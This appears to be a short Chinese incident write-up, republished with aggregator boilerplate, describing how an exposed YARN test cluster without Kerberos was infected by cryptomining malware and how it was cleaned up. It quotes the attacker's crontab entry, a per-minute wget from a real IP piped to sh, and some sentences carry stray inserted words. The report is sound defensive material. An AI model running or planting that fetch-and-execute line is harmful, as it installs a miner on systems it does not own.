Yarn遭到挖礦病毒攻擊
測試環境在阿里雲上暴露出了公網端口,前一段時間CDH集羣本來是開啓了Kerberos認證,可是由於你們反映使用麻煩,因此就又關閉了Kerberos。java
最近幾天你們廣泛反映測試環境上hive和hdfs job執行很慢,yarn進程的cpu使用率持續在200%以上,通過排除CPU使用率已經連續兩天100%且沒有降下來,查看job以下服務器
有39個job明細多餘開發提交的任務數量,且User來自dr.who,這個以前沒有見過,初步判定遭受了攻擊,測試
切換到yarn用戶下:阿里雲
sudo -u yarn crontab -l
顯示* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
且在/var/tmp目錄下多出了一個java文件
解決辦法是關閉掉crontab調度,而且刪掉/var/tmp/java文件,從新開啓kerberos認證服務器恢復正常
相關文章
- 1. 挖礦病毒
- 2. miner2 挖礦病毒
- 3. 服務器被門羅幣挖礦病毒攻擊的處理
- 4. 挖礦病毒攻擊的排查處置手冊
- 5. 門羅幣挖礦病毒
- 6. 挖礦病毒 qW3xT.2
- 7. 處理kdevtmpfsi挖礦病毒
- 8. 挖礦病毒排查
- 9. 挖礦病毒清理
- 10. RegretLocker勒索病毒流行,衆多公司遭遇該病毒攻擊
- 更多相關文章...
- • Rust 輸出到命令行 - RUST 教程
- • 數據庫涉及到哪些技術? - MySQL教程
- • Docker容器實戰(一) - 封神Server端技術
- • 算法總結-回溯法
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 挖礦病毒
- 2. miner2 挖礦病毒
- 3. 服務器被門羅幣挖礦病毒攻擊的處理
- 4. 挖礦病毒攻擊的排查處置手冊
- 5. 門羅幣挖礦病毒
- 6. 挖礦病毒 qW3xT.2
- 7. 處理kdevtmpfsi挖礦病毒
- 8. 挖礦病毒排查
- 9. 挖礦病毒清理
- 10. RegretLocker勒索病毒流行,衆多公司遭遇該病毒攻擊